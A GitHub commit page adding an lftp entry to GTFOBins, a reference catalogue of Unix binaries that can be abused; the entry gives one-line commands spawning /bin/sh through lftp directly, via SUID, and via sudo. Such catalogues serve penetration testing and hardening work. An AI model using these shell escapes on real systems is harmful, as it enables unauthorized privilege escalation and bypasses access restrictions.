Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
master
d4t4s3c 2022-01-16 05:52:47 +01:00 committed by GitHub
parent e357d8f73f
commit 53a34f3c47
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions

9
_gtfobins/lftp.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: lftp -c '!/bin/sh'
limited-suid:
- code: ./lftp -c '!/bin/sh'
sudo:
- code: sudo lftp -c '!/bin/sh'
---